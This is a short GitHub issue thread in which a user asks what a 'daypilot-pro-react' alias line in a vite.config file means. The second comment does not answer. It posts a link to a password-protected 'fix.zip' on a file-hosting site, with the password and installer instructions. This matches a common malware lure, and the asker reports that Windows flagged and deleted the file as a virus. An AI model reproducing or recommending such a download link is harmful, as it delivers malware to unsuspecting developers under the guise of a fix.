### ISSUE TITLE
meaning of code

### ISSUE THREAD

**Issue by whoafridi** [chadiznina/CRM_MERN#1]
what does this code mean in vite.config file 
`   "daypilot-pro-react": "daypilot-pro-react/daypilot-all.min.js",`

**Comment by chenshupe** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by whoafridi** [comment]
seems a virus . windows delete this file automatically . sad . if you have the daypilot pro then send me in other way
